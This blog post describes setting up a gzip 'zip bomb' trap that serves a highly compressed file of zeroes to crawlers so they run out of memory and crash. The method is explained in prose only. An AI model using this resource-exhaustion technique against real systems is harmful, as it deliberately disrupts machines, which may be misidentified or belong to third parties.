The Zip Bomb Trap - A Fun Way to Mess Bots

Ansari
Category : Security
Time to read : 4 mins
By someone tired of dealing with bots scraping, spamming, and hammering their server
The Problem: Bots Are Everywhere, and Most Aren’t Friendly
If you’ve ever put a site online — whether it’s a blog, SaaS product, portfolio, or a half-baked side project — chances are you’ve been hit by bots. Not the good ones like Googlebot or legitimate feed scrapers, but the shady ones:
-
Vulnerability scanners poking at your site for common exploits
-
Spambots injecting garbage content into comment sections or forms
-
Content scrapers stealing your articles and republishing them
-
Crawlers that don’t respect robots.txt or rate limits
I’ve had all of these hit my servers at various points, and one thing became clear:
Most of these bots don’t care about rules, and worse, they’re cheap to run — so they’re persistent.
The Idea: If You Can’t Block Them, Break Them
At some point, I stopped trying to block bots politely. I figured if they’re going to be relentless and ignore all best practices, maybe I could serve them something they’d regret asking for.
That’s when I rediscovered the old concept of zip bombs — small files that expand massively when decompressed.
-
They aren’t viruses.
-
They aren’t destructive on their own.
-
They just exploit the fact that decompression can eat up huge amounts of memory.
Bots love compression. They send:
Accept-Encoding: gzip, deflate
This helps them save bandwidth. So I came across an article that we can set up trap for them and why not give them what they want?
How the Zip Bomb Works
The idea is simple:
-
You create a file full of zeroes (10GB worth).
-
You compress it using gzip — it shrinks down to ~10MB.
-
You serve that 10MB file to bots pretending to be browsers.
And what happens?
-
A naive bot sees the Content-Encoding: gzip header.
-
It tries to decompress.
-
The 10MB becomes 10GB in memory.
-
The bot process crashes or the server it’s on runs out of memory.
I’ve tested this. Many unsophisticated crawlers just disappear after that. They hit /trap, try to decompress, and never come back.
How I Built It
You can check out the repository
Does It Work?
Yes — but only for the kind of bots that are:
-
Naive (don’t verify content type or size)
-
Overly aggressive
-
Poorly sandboxed
And those are usually the worst offenders. No, it’s not foolproof. Smarter bots can:
-
Detect abnormally large gzip responses
-
Cap decompression limits
-
Use partial reads
But the lazy, common, script-kiddie bots? It crushes them. And since they’re automated and fire-and-forget, once they crash once, they usually don’t retry.
Trade-offs and Caveats
-
You pay a small bandwidth cost (serving 10MB) each time.
-
You must be careful not to serve it to legit users.
-
It won’t stop targeted attacks — just disrupt mass bots.
But for my use case — stopping low-level crawlers from hammering endpoints — it was more than worth it.
Conclusion: Fighting Fire with Compression
You won’t find this solution in any OWASP Top 10 defense strategy. It’s a bit rogue. But it’s practical, effective, and simple. If you’re a developer tired of being passive while bots abuse your server, maybe it’s time to hit back — with a zip bomb.